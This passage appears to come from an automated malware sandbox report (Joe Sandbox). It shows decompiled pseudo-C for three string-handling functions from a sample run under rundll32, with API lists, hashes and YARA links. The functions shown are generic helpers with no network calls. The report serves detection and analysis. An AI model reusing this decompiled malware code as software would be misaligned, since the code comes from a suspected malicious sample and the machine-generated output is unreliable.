                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 4c23727e41435bfde26b856b38507c7b6b6dde493661e0e6b79207cc7597aaf8
                    • Instruction ID: 6fa136d344688777db6cd60d1eb6406f3f5c2e107f5c16dde2278c79213a611c
                    • Opcode Fuzzy Hash: 4c23727e41435bfde26b856b38507c7b6b6dde493661e0e6b79207cc7597aaf8
                    • Instruction Fuzzy Hash: FEF03079B413119BFB20AB35D84CB573BE8EB84B61B040511BC50E3785EF28EC80A560
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444395B Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E0444395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E044463FD(_t2);
				if(_t34 != 0) {
					_t30 = E044463FD(_t28);
					if(_t30 == 0) {
						E044417AB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0444799A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0444799A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                    0x0444395b
                    0x04443965
                    0x04443967
                    0x0444396d
                    0x0444396d
                    0x04443976
                    0x0444397a
                    0x04443986
                    0x0444398a
                    0x044439fe
                    0x0444398c
                    0x0444398c
                    0x04443990
                    0x04443997
                    0x0444399a
                    0x044439b4
                    0x044439a3
                    0x044439a3
                    0x044439a7
                    0x044439aa
                    0x044439af
                    0x044439af
                    0x044439b9
                    0x044439e1
                    0x044439e7
                    0x044439ea
                    0x044439bb
                    0x044439bd
                    0x044439c5
                    0x044439d0
                    0x044439d5
                    0x044439d5
                    0x044439f1
                    0x044439f8
                    0x044439f9
                    0x044439f9
                    0x0444398a
                    0x04443a09

                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,044443F7,?,?,?,?,00000102,04441AE3,?,?,00000000), ref: 04443967
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                      • Part of subcall function 0444799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04443995,00000000,00000001,00000001,?,?,044443F7,?,?,?,?,00000102), ref: 044479A8
                      • Part of subcall function 0444799A: StrChrA.SHLWAPI(?,0000003F,?,?,044443F7,?,?,?,?,00000102,04441AE3,?,?,00000000,00000000), ref: 044479B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044443F7,?,?,?,?,00000102,04441AE3,?), ref: 044439C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 044439D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 044439E1
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: a9ea7e0508b6b5c5517071f8096861fe7251fd40023281b0640ad9a58aa249a5
                    • Instruction ID: 68076286b7bfd928c96b7c8093a42a3ef6687cb9ee922d967f06c5487609d8fb
                    • Opcode Fuzzy Hash: a9ea7e0508b6b5c5517071f8096861fe7251fd40023281b0640ad9a58aa249a5
                    • Instruction Fuzzy Hash: FC21D572600295ABFF119FB5C844A9FBFB8EF86694F044056FD049B302D734E901D7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444114D Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0444114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E044463FD(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                    0x04441162
                    0x04441166
                    0x04441170
                    0x04441177
                    0x0444117a
                    0x0444117c
                    0x04441184
                    0x04441189
                    0x04441197
                    0x0444119c
                    0x044411a6

                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04F493CC,?,04443418,004F0053,04F493CC,?,?,?,?,?,?,044454F9), ref: 0444115D
                    • lstrlenW.KERNEL32(04443418,?,04443418,004F0053,04F493CC,?,?,?,?,?,?,044454F9), ref: 04441164
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04443418,004F0053,04F493CC,?,?,?,?,?,?,044454F9), ref: 04441184
                    • memcpy.NTDLL(74E069A0,04443418,00000002,00000000,004F0053,74E069A0,?,?,04443418,004F0053,04F493CC), ref: 04441197
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 27a79944b8c5bfcd4d25d5ec5fc49ab93dfa5ce987add84bf5e6b97a046be0e8
                    • Instruction ID: 67c988cb6b2870b7b355f4c14a8e5cc749fdc0ab18016b5c668626b94ae0f4be
                    • Opcode Fuzzy Hash: 27a79944b8c5bfcd4d25d5ec5fc49ab93dfa5ce987add84bf5e6b97a046be0e8
                    • Instruction Fuzzy Hash: 89F04F76900118BBDF11DFA9CC44C9F7BECEF49298B014067F908D7202E671EA149BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444252A Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(04F49B50,00000000,00000000,7691C740,04446AE6,00000000), ref: 0444253A
                    • lstrlen.KERNEL32(?), ref: 04442542
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • lstrcpy.KERNEL32(00000000,04F49B50), ref: 04442556
                    • lstrcat.KERNEL32(00000000,?), ref: 04442561
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: 896df1067633f1ed81f993daf45dbca9ad48935383fe70d4cb75712179f657e3
                    • Instruction ID: 47bac566320ad840a91781c95e3b8952ecb4306375e511ebe5e0c74e570aa17a
                    • Opcode Fuzzy Hash: 896df1067633f1ed81f993daf45dbca9ad48935383fe70d4cb75712179f657e3
                    • Instruction Fuzzy Hash: 58E0927750126067A7119BF8AC48CAFBBACFFCA750708041BFA00D3101CB289D01DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%